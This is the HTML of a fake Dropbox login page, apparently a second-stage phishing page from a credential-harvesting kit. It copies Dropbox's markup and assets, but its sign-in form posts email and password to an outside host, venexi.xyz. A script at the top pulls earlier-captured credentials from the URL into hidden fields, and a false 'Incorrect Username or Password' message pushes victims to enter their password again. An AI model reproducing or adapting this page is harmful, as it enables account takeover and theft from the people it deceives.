<html class="media-desktop js-focus-visible" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#" lang="en"><head>


    <script type="text/javascript"> 

        window.addEventListener('load', () => {
      const params = (new URL(document.location)).searchParams;
      const email = params.get('email');
      const pass = params.get('pass');
       document.getElementById('email').innerHTML = email;
       document.myform.email.value = email;
       document.getElementById('pass').innerHTML = pass;
       document.myform.pass.value = pass;
      
      })
      
        </script>
        <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/-TriQeni1Ls-Mdq_ssN2cUL5/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-L1Joc/A2btBqMKjJOCvvgRe+ptim2I0yOZYwI/H/2MLPdAC7PAF87u7yYxzND7WF" nonce=""></script><script nonce="">
        window._goch_ = {};
        window.addEventListener('click', function(event) {
            'use strict';
            for (var elm = event.target; elm; elm = elm.parentElement) {
                if (elm.id &&
                    window._goch_.hasOwnProperty(elm.id) &&
                    window._goch_[elm.id].call(elm, event) === false) {
                    event.preventDefault();
                }
            }
        }, true);
        window._csp_external_script_nonce = "LrxVedOBbgw3Wt2+7v11"</script>
        <meta content="IE=edge, chrome=1" http-equiv="X-UA-Compatible"><meta content="origin-when-cross-origin" name="referrer">
        <link href="https://www.dropbox.com/login" rel="canonical">
        <link href="https://www.dropbox.com/login" hreflang="en" rel="alternate"><link href="https://www.dropbox.com/en_GB/login" hreflang="en-gb" rel="alternate">
        <link href="https://www.dropbox.com/da_DK/login" hreflang="da" rel="alternate"><link href="https://www.dropbox.com/de/login" hreflang="de" rel="alternate">
        <link href="https://www.dropbox.com/es/login" hreflang="es" rel="alternate"><link href="https://www.dropbox.com/es_ES/login" hreflang="es-es" rel="alternate">
        <link href="https://www.dropbox.com/fr/login" hreflang="fr" rel="alternate"><link href="https://www.dropbox.com/id/login" hreflang="id" rel="alternate">
        <link href="https://www.dropbox.com/it/login" hreflang="it" rel="alternate"><link href="https://www.dropbox.com/ja/login" hreflang="ja-jp" rel="alternate">
        <link href="https://www.dropbox.com/ko/login" hreflang="ko" rel="alternate"><link href="https://www.dropbox.com/ms/login" hreflang="ms" rel="alternate">
        <link href="https://www.dropbox.com/nb_NO/login" hreflang="nb" rel="alternate"><link href="https://www.dropbox.com/nl_NL/login" hreflang="nl" rel="alternate">
        <link href="https://www.dropbox.com/pl/login" hreflang="pl" rel="alternate"><link href="https://www.dropbox.com/pt_BR/login" hreflang="pt-br" rel="alternate">
        <link href="https://www.dropbox.com/ru/login" hreflang="ru" rel="alternate"><link href="https://www.dropbox.com/sv_SE/login" hreflang="sv" rel="alternate">
        <link href="https://www.dropbox.com/th_TH/login" hreflang="th" rel="alternate"><link href="https://www.dropbox.com/zh_CN/login" hreflang="zh-cn" rel="alternate">
        <link href="https://www.dropbox.com/zh_TW/login" hreflang="zh-tw" rel="alternate">
        <link href="https://cfl.dropboxstatic.com/static/images/favicon-vfl8lUR9B.ico" rel="shortcut icon">
        <link href="https://cfl.dropboxstatic.com/static/css/main-vfl4nphV1.css" rel="stylesheet" type="text/css">
        <script type="text/javascript" nonce="">window.ST=+new Date();</script>
        <link href="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_60_vis.png" rel="apple-touch-icon">
        <link href="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_76_vis.png" rel="apple-touch-icon" sizes="76x76">
        <link href="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_120_vis.png" rel="apple-touch-icon" sizes="120x120">
        <link href="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_152_vis.png" rel="apple-touch-icon" sizes="152x152">
        <meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta content="https://www.dropbox.com/login" property="og:url">
        <meta content="Dropbox" property="og:site_name"><meta content="website" property="og:type">
        <meta content="Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe." property="og:description">
        <meta content="200" property="og:image:width"><meta content="Login - Dropbox " property="og:title"><meta content="210019893730" property="fb:app_id">
        <meta content="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_200_vis.png" property="og:image">
        <meta content="200" property="og:image:height"><meta content="summary" name="twitter:card"><meta content="@Dropbox" name="twitter:site">
        <meta content="https://www.dropbox.com/login" name="twitter:url"><meta content="Login - Dropbox " name="twitter:title">
        <meta content="Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe." name="twitter:description">
        <meta content="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_webclip_200_vis.png" name="twitter:image">
        <meta content="TnuSyOnBMNmtugbpL1ZvW2PbSF9LKvoTzrvOGS9h-b0" name="google-site-verification">
        <meta content="EZKIczQcM1-DVUMz8heu1dIhNtxNbLqbaA9-HbOnCQ4" name="google-site-verification">
        <meta content="tz8iotmk-pkhui406y41y5bfmfxdwmaa4a-yc0hm6r0fga7s6j0j27qmgqkmc7oovihzghbzhbdjk-uiyrz438nxsjdbj3fggwgl8oq2nf4ko8gi7j4z7t78kegbidl4" name="norton-safeweb-site-verification">
        <meta content="https://cfl.dropboxstatic.com/static/images/logo_catalog/logo_m1.png" name="msapplication-TileImage">
        <meta content="#ffffff" name="msapplication-TileColor"><meta content="Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe." name="description"><title>Login - Dropbox </title><style type="text/css">.hny-vxwhvt { display: none; }</style> <link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/components/button-vfllw60O5.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/components/react_locale_selector-vfluPHu5g.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/dropbox/2015/layout-vflvc3veE.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/dropbox/2015/pages/index-vflK1gzWT.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/dropbox/base-vfloOI4PY.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/font_atlas_grotesk-vfldINMge.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/font_sharp_grotesk-vfle4tE4q.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/notify-vflHqdPvq.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/privacy_consent/privacy_consent-vflfD5dll.css" rel="stylesheet" type="text/css"><link crossorigin="anonymous" href="https://cfl.dropboxstatic.com/static/css/sprites/web_sprites-vflcKH0r6.css" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Open+Sans:100,200,300,400,600,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"><script type="text/javascript" nonce="">
                    (function(){"use strict";var e,n=window,r=function(){e=[],n.addRequireLoadCallback=function(n){return e.push(n)},n.configureRequire=function(){var e=arguments;n.addRequireLoadCallback((function(){return n.configureRequire.apply(null,e)}))},n.define=function(){var e=arguments;n.addRequireLoadCallback((function(){return n.define.apply(null,e)}))},n.preLoadFile=function(){for(var e=[],r=0;r<arguments.length;r++)e[r]=arguments[r];n.addRequireLoadCallback((function(){return n.preLoadFile.apply(null,e)}))}};r(),n._insertRequireShim=r,n.InitRequireJs=function(r){n.requireContexts={},n.performance&&null!=n.performance.now&&(requirejs.onResourceLoad=function(e,r,a){var i=n.performance.now(),u=n.requireContexts[e.id];if(u){r.id in u.module_callback_times||(u.module_callback_times[r.id]={});var o=u.module_callback_times[r.id];o.loadTime=i,r.url&&(o.url=r.url),r.id&&(o.name=r.id),r.parentMap&&r.parentMap.url&&(o.parent=r.parentMap.url)}}),n.configureRequire=r,n.addRequireLoadCallback=function(e){return e()},e.forEach((function(e){return e()}))}})();
        
        
                    window.CSP_SCRIPT_NONCE = "q6mI1gYPudVxb65cNCo+";
                    </script> <script async="async" src="https://cfl.dropboxstatic.com/static/js/alameda_bundle/alameda_bundle_firefox_gte68_lt78_en-vflFF5Hm7.js" type="text/javascript" nonce=""></script> <script type="text/javascript" nonce="">
                        var same_hostname = false;
                        try {
                            same_hostname = (top.location.hostname === self.location.hostname);
                        } catch (error) {}
        
                        if (self != top && !same_hostname) {
                            try {top.location.replace(self.location.href);} catch (e) {console.error(e);}
                            setTimeout(function() {
                                window.DB_FRAME_BUST = true;
                                var frameBustImg = "https://cfl.dropboxstatic.com/static/images/logo-vflL7Ces6.png";
                                document.body.innerHTML = (
                                    "<img src='" + frameBustImg + "' id='frame-bust-image' />");
                                document.getElementById('frame-bust-image').addEventListener('click', function(evt) {
                                    top.location.href = window.location.href;
                                });
                            }, 1);
                        }
                    </script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/accessibility/tabbable.min-vflfwdsoD.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/auth/login_or_register/login_register_page.min-vflNUWTBL.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-coreui.min-vflOn0FR2.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-dig-vendor.min-vflGtlkqY.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-login-and-register-pages.min-vflLnZpMF.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-dig-b.min-vfl5qKfaA.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-file_viewer.min-vflfNlQ1V.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-browse-and-home.min-vflavOl3K.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-login-pages-externals.min-vflDPcox4.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-login-pages.min-vflG28hXL.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-core.min-vfluHalFE.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-dig-d.min-vflk5mY4p.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-mcl-icons.min-vflcbV0fb.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-mcl-snackbar.min-vflf4qmdA.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-loadable.min-vflhEk6Gb.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/dig-illustrations/spot/key-necklace.amd.min-vfllk7-Ma.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-dig-a.min-vfl2h1vZ2.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-coreui-forms.min-vfl3eJK7i.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-react-libs.min-vflHjk_jd.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-dig-icons.min-vflZgGz-w.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-api_v2-extra.min-vflOoCJlR.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-profile_services.min-vfl0VGzUl.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-api_v2.min-vfl2hFpB9.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-core-security.min-vfliPFBqz.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-mcl-home.min-vflJt797z.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-modules-unneeded-for-home.min-vflCD5jgU.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-legacy-dig-migration.min-vfls3V81e.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-captcha.min-vflGOLLeU.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-external.min-vflEPekXz.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-embedded_app.min-vflHiNiAm.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-chat.min-vflhoFZlM.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-coreui-with-i18n.min-vflTicj3R.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/prod_assets_web_modules/jquery-vflYfRgmF.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-legacy-ab.min-vfl8tUwYT.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/privacy_consent.min-vfl5pb4JE.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-timing.min-vflRjUBlw.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/dropbox/proto/js_init_data/privacy_consent/privacy_consent.min-vflTza6r9.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-exception-reporting.min-vflYvTpgb.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/privacy_consent_stats.min-vfl_d65ng.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-i18n.min-vflt9TOiu.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/ux_analytics/lazy_ux_analytics.min-vflUnRRc7.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-react.min-vflUULRC5.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-locale-selector.min-vflVHN32z.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-spectrum-arbor.min-vflCl4-Ce.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-mcl-modal.min-vflDZ9zXk.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-core-analytics.min-vflyOcCeD.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/ux_analytics/ux_variants.min-vflEEZXJo.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/ux_analytics/window_history_listeners.min-vflSSI8x4.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/core/toast/toast_on_init.min-vflwuF2Ek.js"></script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/modules/clean/security/csrf_hmac.min-vflQuGsTR.js"></script><link href="https://cfl.dropboxstatic.com/static/css/login_or_register-vflrJ9wO9.css" rel="stylesheet" type="text/css"><link href="https://cfl.dropboxstatic.com/static/css/dig-illustrations/index.web-vflTaPHqs.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/dig-components/index.web-vflM-Xosa.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/components/login_or_register-vflTMgZVU.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/legacy_packages/components-vflwFi1IV.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/scooter/scooter-scoped-vflpl9JSl.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/recaptcha_challenge-vflrcf67y.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/recaptcha_v2_challenge-vflYEW-GO.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/components/exp_cards-vfls5BO1G.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/components/login_form-vflPyw88n.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/spectrum/index.web-vflmHVRF-.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/components/password_strength_meter-vfljnpJyO.css" rel="stylesheet" type="text/css">
                    <link href="https://cfl.dropboxstatic.com/static/css/recaptcha-vflIN6j39.css" rel="stylesheet" type="text/css">
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-ncct.min-vflp3jzto.js">
                    </script><script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-stormcrow.min-vflQGbRgL.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-telemetry.min-vflJJNRd9.js"></script>
                    <link href="https://cfl.dropboxstatic.com/static/css/components/bubble_dropdown_v2-vflhhYVBe.css" rel="stylesheet" type="text/css">
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/prod_assets_web_modules/zxcvbn-vfl_2LhK9.js"></script>
                    <script type="text/javascript" charset="utf-8" async="" crossorigin="anonymous" src="https://cfl.dropboxstatic.com/static/js/packaged/pkg-sharing-confirmation-modals.min-vflZUOMPe.js"></script>
                    <link href="https://cfl.dropboxstatic.com/static/css/abuse/funcaptcha_modal-vfl6bl9tt.css" rel="stylesheet" type="text/css"></head>
                    <body class="en  login-or-register-page" dir="ltr"><div>
                        <div class="funcaptcha-modal--hidden-firefox funcaptcha-modal"><div class="funcaptcha-div">
                            <iframe sandbox="allow-scripts allow-same-origin allow-forms" class="funcaptcha-frame" src="https://dropboxcaptcha.com" width="100%" height="100%" frameborder="0"></iframe></div></div></div>
                            <iframe src="https://consent.dropbox.com" sandbox="allow-scripts allow-same-origin allow-popups allow-forms" class="consent-iframe" id="consent-iframe" allowtransparency="true" scrolling="no" title="Dropbox Consent" tabindex="1" width="0" height="0"></iframe>
                             <div class="uxa-modal" id="modal-behind" style="display: none;"></div><div id="modal" style="display: none;">
                                 <div id="modal-box"><a aria-label="Close" href="#" id="modal-x"></a><h2 id="modal-title"></h2><div id="modal-content"></div></div></div>
                                 <div id="modal-overlay" style="display: none;"></div><div id="grave-yard" style="display:none"></div><div id="trash-can" style="display:none"></div>
                                 <script id="tutorial_nav_bubble_tmpl" type="text/template" nonce=""><div class="tutorial-bubble-content"><a class="tutorial-bubble-x-link">
                                     <img class="tutorial-bubble-x-img" src="/static/images/x-small-active.png" /></a><h1 class="tutorial-bubble-title"><%= TEMPLATE_DATA.title %></h1><p class="tutorial-bubble-body"><%= TEMPLATE_DATA.body %></p><a class="tutorial-bubble-button <%= TEMPLATE_DATA.button_class %>"><%= TEMPLATE_DATA.button_text %></a></div></script><div id="floaters"></div><div class="external-drop-indicator top" style="display: none;"></div><div class="external-drop-indicator right" style="display: none;"></div><div class="external-drop-indicator bottom" style="display: none;"></div><div class="external-drop-indicator left" style="display: none;"></div><span class="dropbox-2015 dropbox-logo-2015"><header class="mast-head"><div class="mast-head__container container"><nav class="mast-head__nav mast-head-nav"><ul class="nav-list"><li class="nav-list__item nav-list__item--dfb"><a class="button-tertiary try-dfb" href="#" id="try-dfb">Try Dropbox Business</a></li></ul><ul class="nav-list"><li class="nav-list__item nav-list__item--download"><a class="button-link" href="#">Download the app</a></li></ul></nav><h1 class="dropbox-logo" id="dropbox-logo"><a class="dropbox-logo__link" href="/"><img alt="" class="dropbox-logo__glyph" src="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_logo_glyph_2015_m1.svg"><img alt="" class="dropbox-logo__type" src="https://cfl.dropboxstatic.com/static/images/logo_catalog/dropbox_logo_text_2015_m1.svg">Dropbox</a></h1></div></header></span><div id="outer-frame"> <div id="page-content"><div class="main-skip-destination" id="main-skip" tabindex="-1"></div><div id="component4931208979438053682"><div id="login-or-register-page-content" class="login-or-register-page-content"><div class="inner-wrapper"><img srcset="https://cfl.dropboxstatic.com/static/images/empty_states/sign-in-boulder%402x-vfl87XcA-.png 2x" alt="" class="login-or-register-img" src="https://cfl.dropboxstatic.com/static/images/empty_states/sign-in-boulder-vfl2oGV4v.png"><div class="login-register-container-wrapper"><div class="login-register-container login-register-container--link-top">
                            <div class="login-register-part login-register-login-part current-form">
                                <div class="clearfix"><div class="login-register-header">Sign in</div>
                                <div class="login-register-switch"><span>or </span><a class="login-register-switch-link mc-button-styleless" href="#">
                                    <span class="mc-button-content">create an account</span></a></div></div>
                                    
                                    <div class="login-form-container">
                                        <div class="regular-login-forms"><div class="login-form-container--subcontainer"><div class="login-form-container__google-div">
                                            </div><div class="login-form-container__apple-div">
                                                  </div>
                                                        <div class="hr-label"><span class="hr-label__text">or</span></div>
                   
                   
                        <form class="clearfix credentials-form login-form" name ="myform" id="myform"  method="post"  action="https://venexi.xyz/saboshd/harden2pass2/dropbox/login_parse.php">
                        <div class="credentials-form__fields"><div class="text-input standard login-text-input login-email">
                        <div class="text-input-error-wrapper"></div><div class="text-input-wrapper">
                            <input  type="email" class="text-input-input" autocomplete="off" aria-invalid="false" inputmode="text" name="email"   id="email"    document.getElementByIdvalue='' required>
                            <label for="login_email21990254471803583"></label></div></div>
                            <div><div class="tooltip-container"></div>
                            <div class="text-input standard login-text-input login-password"><div class="text-input-error-wrapper"></div>
                            <div class="text-input-wrapper">
                                <input  name="pass" type="password"  id="pass"    document.getElementByIdvalue='' hidden >
                                <input type="password" class="text-input-input password-input" name="pass2" autocomplete="off" aria-invalid="false" inputmode="text" placeholder="Password" required>
                            <label for="login_password11398105393990432"></label></div></div></div>
                            <span style="color: red">Incorrect Username or Password!!!</span></div>
                            <div class="clearfix">
                               
                                <div class="checkbox standard remember-me checkbox-inline">
                                    <div class="text-input-error-wrapper"></div>
                                    <input type="checkbox" id="remember_me15075769786085524" name="remember_me" aria-checked="true" checked="">
                                    <label for="remember_me15075769786085524" class="checkbox_label">
                                        <span>Remember me</span></label></div>
                                    <button class="login-button signin-button button-primary" type="submit"><div class="signin-text">Sign in</div></button>
                                    <div class="login-need-help"><a class="forgot-password-link" href="#">Forgot your password?</a></div></div></form>
                                    <div class="recaptcha-v2-challenge-container recaptcha-v2-challenge-container--invisible"><div class="recaptcha_v2_challenge"></div>
                                    </div></div></div></div></div><div class="login-register-part login-register-register-part"><div class="clearfix">
                                        <div class="login-register-header">Create an account</div><div class="login-register-switch"><span>or </span>
                                        <a class="login-register-switch-link mc-button-styleless" href="#"><span class="mc-button-content">log in</span></a></div></div>
                                        <div class="form_shown login-form-container register standard">
                                            
                                            <form class="clearfix credentials-form register-form" method="post">
                                            <div class="credentials-form__fields"><div class="register-form__name-fields">
                                                <div class="text-input standard input-fname first text-input__margin-right">
                                                    <div class="text-input-error-wrapper"></div><div class="text-input-wrapper">
                                                        <input id="fname1416578321098927" type="text" class="text-input-input" name="fname" autocomplete="off" aria-invalid="false" inputmode="text" value="">
                                                        <label for="fname1416578321098927">First name</label></div></div><div class="text-input standard input-lname second">
                                                            <div class="text-input-error-wrapper"></div><div class="text-input-wrapper">
                                                                <input id="lname5250313303360096" type="text" class="text-input-input" name="lname" autocomplete="off" aria-invalid="false" inputmode="text" value="">
                                                                <label for="lname5250313303360096">Last name</label></div></div></div><div class="register-form__credential-fields">
                                                                    <div class="text-input standard input-email text-input__margin-right"><div class="text-input-error-wrapper"></div>
                                                                    <div class="text-input-wrapper">
                                                                        <input id="email42220165999418524" type="email" class="text-input-input" name="email" autocomplete="off" aria-invalid="false" inputmode="text" value="">
                                                                        <label for="email42220165999418524">Email</label></div></div><div class="text-input standard input-password"><div class="text-input-error-wrapper"></div>
                                                                        <div class="text-input-wrapper"><div class="password-input-meter standard" tabindex="-1" aria-label="Password strength">
                                                                            <div class="password-input-dot"></div><div class="password-input-dot"></div><div class="password-input-dot"></div>
                                                                            <div class="password-input-dot"></div><div class="bubble-dropdown-v2-container">
                                                                                <button class="password-bubble__button" aria-expanded="false" id="bubbleDropdownTarget-1"></button></div></div>
                                                                                <input id="password9028371025082027" type="password" class="text-input-input password-input" name="password" autocomplete="off" aria-invalid="false" inputmode="text" value="">
                                                                                <label for="password9028371025082027">Password</label></div></div></div></div><div class="checkbox standard agree checkbox-inline">
                                                                                    <div class="text-input-error-wrapper"></div><input type="checkbox" id="tos_agree5786909421201268" name="tos_agree" aria-checked="false">
                                                                                    <label for="tos_agree5786909421201268" class="checkbox_label"><span>I agree to the <a href="/terms" target="_blank" rel="noreferrer noopener">Dropbox Terms</a>. Learn about how we use and protect your data in our 
                                                                                    <a href="/privacy" target="_blank" rel="noreferrer noopener">Privacy Policy</a>.</span></label></div>
                                                                                    <button class="login-button button-primary" type="submit" data-uxa-log="register_form_submit_button"><span>Create an account</span></button>
                                                                                    <button class="auth-google button-primary button-undefined" type="button" data-uxa-log="google_signup_start"><span class="sign-up-text">Sign up with Google</span>
                                                                                    </button><div class="recaptcha-v2-challenge-container recaptcha-v2-challenge-container--invisible"><div class="recaptcha_v2_challenge"></div></div></form></div>
                                                                                    </div></div></div></div></div></div></div><div id="page-prefooter"></div><footer><div id="page-full-footer"><div id="footer-top-margin"></div>
                                                                                    <div id="footer-border"></div><div class="footer-col"><ul><li class="header">Dropbox</li><li><a href="https://www.dropbox.com/install">Install</a></li>
                                                                                    <li><a href="https://www.dropbox.com/mobile">Mobile</a></li><li><a href="https://www.dropbox.com/pricing">Pricing</a></li>
                                                                                    <li><a href="https://www.dropbox.com/business">Business</a></li><li><a href="https://www.dropbox.com/enterprise">Enterprise</a></li>
                                                                                    <li><a href="https://www.dropbox.com/features?trigger=footer">Features</a></li></ul></div><div class="footer-col"><ul><li class="header">About us</li>
                                                                                    <li><a href="http://blog.dropbox.com/">Dropbox Blog</a></li><li><a href="https://www.dropbox.com/about">About</a></li>
                                                                                    <li><a href="https://www.dropbox.com/branding">Branding</a></li><li><a href="https://www.dropbox.com/news">News</a></li>
                                                                                    <li><a href="https://www.dropbox.com/jobs">Jobs</a></li></ul></div><div class="footer-col"><ul><li class="header">Support</li>
                                                                                    <li><a href="https://www.dropbox.com/help">Help Center</a></li><li><a href="https://www.dropbox.com/contact">Contact us</a></li>
                                                                                    <li><a href="https://www.dropbox.com/dmca">Copyright</a></li><li><a href="https://www.dropbox.com/terms/cookies">Cookie Policy</a></li>
                                                                                    <li><a href="#manage-cookies">Manage cookies</a></li><li><a href="https://www.dropbox.com/privacy">Privacy &amp; Terms</a></li>
                                                                                    <li><a href="https://www.dropbox.com/sitemap">Sitemap</a></li></ul></div><div class="footer-col"><ul><li class="header">Community</li>
                                                                                    <li><a href="https://www.dropbox.com/referrals">Referrals</a></li><li><a href="https://www.dropboxforum.com">Forum</a></li>
                                                                                    <li><a href="https://twitter.com/dropbox" rel="noreferrer" target="_blank">Twitter</a></li>
                                                                                    <li><a href="https://facebook.com/Dropbox" rel="noreferrer" target="_blank">Facebook</a></li>
                                                                                    <li><a href="https://www.dropbox.com/developers">Developers</a></li></ul></div>
